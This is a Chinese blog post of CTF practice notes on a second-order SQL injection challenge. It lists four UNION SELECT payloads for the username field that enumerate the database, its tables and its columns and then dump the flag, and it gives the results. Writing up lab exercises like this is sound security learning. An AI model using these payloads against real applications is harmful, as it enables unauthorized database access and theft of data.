刷题笔记:October 2019 Twice SQL Injection

CTF Web SQL注入
Web
发布日期:   2021-08-30
更新日期:   2022-01-28
文章字数:   109
阅读时长:   1 分

前言

关键字:[二次注入]

题解

还在change那里试了半天,没想到注入点竟然在登录。应该多试试的唉。

payload:

username =1' union select database() #
username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #

username =1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#

username =1' union select flag from flag #

数据库

ctftraining

flag,news,users

flag

数据

flag{934730c7-4ab2-406b-9c62-819bc6c4e1c6}
文章作者: 巡璃
文章链接: https://syunaht.com/p/3288058269.html
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 巡璃 !
CTF Web SQL注入
评论
  目录